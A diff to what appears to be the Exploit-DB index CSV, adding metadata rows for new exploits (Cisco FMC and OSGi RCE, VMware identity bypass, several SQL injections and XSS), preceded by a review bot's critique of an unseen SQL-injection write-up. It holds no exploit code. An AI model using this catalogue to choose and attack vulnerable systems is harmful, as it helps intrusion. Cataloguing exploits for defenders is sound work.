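Review bot: `**Date:** 2023-26-12` is not a valid date (there is no month 26); presumably `2023-12-26`. In the sqlmap command, `tamper=between,randomcase` is missing its leading `--`, so the line does not run as published. The captured request states `Content-Length: 317` while the body shown (`uemail=user@mail.com&login=LOG+IN&password=P@ass123`) is 51 bytes, which suggests the request was trimmed after capture; either the header or the body should be corrected so the sample is self-consistent. The description's "exploit latest vulnerabilities in the underlying database" is vague — naming the actual impact demonstrated (unauthenticated read of the `loginsystem` database) would be more useful to someone triaging it.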


@ -4165,6 +4165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30362,exploits/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-16,2013-12-16,0,CVE-2013-6976;OSVDB-101097,,,,,
30415,exploits/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-22,2013-12-22,0,CVE-2013-6976;OSVDB-101097,,,,,
46263,exploits/hardware/webapps/46263.txt,"Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting",2019-01-28,"Bhushan B. Patil",webapps,hardware,443,2019-01-28,2019-01-30,1,CVE-2019-1642,"Cross-Site Scripting (XSS)",,,,
51881,exploits/hardware/webapps/51881.py,"Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE",2024-03-12,"Abdualhadi khalifa",webapps,hardware,,2024-03-12,2024-03-12,0,,,,,,
25292,exploits/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,webapps,hardware,,2013-05-07,2016-10-27,0,CVE-2013-2684;CVE-2013-2683;CVE-2013-2682;CVE-2013-2681;CVE-2013-2680;CVE-2013-2679;CVE-2013-2678;OSVDB-93065;OSVDB-93064;OSVDB-93063;OSVDB-93062;OSVDB-93061;OSVDB-93060;OSVDB-93059;OSVDB-89911,,,,,
16252,exploits/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",webapps,hardware,,2011-02-26,2011-02-26,0,OSVDB-71032,,,,,
18503,exploits/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",webapps,hardware,,2012-02-21,2012-02-21,0,OSVDB-80809,,,,,
@ -11528,6 +11529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/3220fa6a56c61cf53652e98356f94e0c6a833cd3/Vitek_RCE_and_information_disclosure.txt
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/96892a5e7d513298b3181265055d437753dbaa55/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple,,2010-11-30,2013-12-08,1,OSVDB-69586,,,http://www.exploit-db.com/screenshots/idlt16000/vmware-traversal.png,,
51882,exploits/multiple/remote/51882.py,"VMware Cloud Director 10.5 - Bypass identity verification",2024-03-12,"Abdualhadi khalifa",remote,multiple,,2024-03-12,2024-03-12,0,,,,,,
28312,exploits/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",remote,multiple,,2006-07-31,2013-09-15,1,CVE-2006-2481;OSVDB-27695,,,,,https://www.securityfocus.com/bid/19249/info
28962,exploits/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,remote,multiple,,2013-10-14,2013-10-14,1,OSVDB-98804;CVE-2013-6366,"Metasploit Framework (MSF)",,,,
33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple,,2009-10-27,2014-05-12,1,CVE-2009-3733;OSVDB-59440,,,,,https://www.securityfocus.com/bid/36842/info
@ -12112,6 +12114,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation (Authenticated)",2021-11-29,"Hubert Wojciechowski",webapps,multiple,,2021-11-29,2021-11-29,0,,,,,http://www.exploit-db.comos-php72-setup.zip,
46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
51879,exploits/multiple/webapps/51879.py,"OSGi v3.7.2 (and below) Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
51878,exploits/multiple/webapps/51878.py,"OSGi v3.8-3.18 Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,,
32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
@ -12210,6 +12214,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
51883,exploits/multiple/webapps/51883.txt,"SnipeIT 6.2.1 - Stored Cross Site Scripting",2024-03-12,"Shahzaib Ali Khan",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00010,,,,,http://gulftech.org/advisories/Snitz%20Forums%202000%20Multiple%20Vulnerabilities/10
48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
@ -15830,6 +15835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php,,2010-05-03,,1,,,,,,
21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php,,2002-05-12,2012-09-22,1,OSVDB-86919,,,,,https://www.securityfocus.com/bid/4756/info
51135,exploits/php/webapps/51135.txt,"ClicShopping v3.402 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
51880,exploits/php/webapps/51880.txt,"Client Details System 1.0 - SQL Injection",2024-03-12,"Hamdi Sevben",webapps,php,,2024-03-12,2024-03-12,0,,,,,,
41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php,,2017-02-09,2017-02-09,0,,,,,,
48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,,2020-10-27,2020-10-27,0,,,,,,
50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,,2021-08-04,2021-08-04,0,,,,,,
@ -19721,6 +19727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
51877,exploits/php/webapps/51877.txt,"Human Resource Management System 1.0 - 'employeeid' SQL Injection",2024-03-12,Srikar,webapps,php,,2024-03-12,2024-03-12,0,,,,,,
51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
